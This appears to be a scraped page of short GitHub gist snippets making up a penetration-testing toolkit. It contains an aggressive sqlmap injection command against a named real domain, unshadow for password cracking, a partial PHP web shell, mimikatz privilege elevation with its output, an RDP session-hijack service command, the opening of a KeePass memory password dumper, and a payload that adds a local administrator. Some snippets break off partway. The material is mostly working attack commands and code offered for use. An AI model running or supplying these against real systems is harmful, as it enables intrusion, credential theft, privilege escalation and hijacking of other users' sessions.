This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap -u https://documents.tesla.eu/busydoc.dc?id= --banner --random-agent -v 3 --tamper="apostrophemask,apostrophenullencode,between,chardoubleencode,charencode,charunicodeencode" --level=5 --risk=3 --dbms=mysql --current-db --current-user | |
| The more information you feel the command the better it can perform |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kali@kali:~$ unshadow passwd.txt shadow.txt | |
| kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mimikatz # ts::remote /id:1 #This will fail if you didnt started the session as SYSTEM | |
| mimikatz # privilege::debug | |
| Privilege '20' OK | |
| mimikatz # token::elevate | |
| Token Id : 0 | |
| User name : | |
| SID name : NT AUTHORITY\SYSTEM | |
| 640 {0;000003e7} 0 D 35719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary | |
| -> Impersonated ! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mimikatz # ts::sessions | |
| Session: 1 - RDP-Tcp#0 | |
| state: Active (0) | |
| user : Administrator @ hacklab | |
| Conn : 9/25/2021 2:09:14 AM | |
| disc : 9/25/2021 2:09:13 AM | |
| logon: 9/25/2021 12:35:03 AM | |
| last : 9/25/2021 6:45:06 AM | |
| curr : 9/25/2021 6:48:11 AM |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2" | |
| net start sesshijack |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Runtime.InteropServices; | |
| using System.Text.RegularExpressions; | |
| namespace keepass_password_dumper | |
| { | |
| internal static class Program | |
| { | |
| private const string AllowedChars = "^[\x20-\x7E]+$"; | |
| private const int BufferSize = 524288; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dotnet run c:\test\KeePass.DMP |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project Sdk="Microsoft.NET.Sdk"> | |
| <PropertyGroup> | |
| <OutputType>Exe</OutputType> | |
| <TargetFramework>net7.0</TargetFramework> | |
| <ImplicitUsings>enable</ImplicitUsings> | |
| <Nullable>enable</Nullable> | |
| </PropertyGroup> | |
| </Project> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void DoStuff() { | |
| // Replace all this code by your payload | |
| STARTUPINFO si = { sizeof(STARTUPINFO) }; | |
| PROCESS_INFORMATION pi; | |
| CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add", | |
| NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi); | |
| CloseHandle(pi.hProcess); | |
| CloseHandle(pi.hThread); |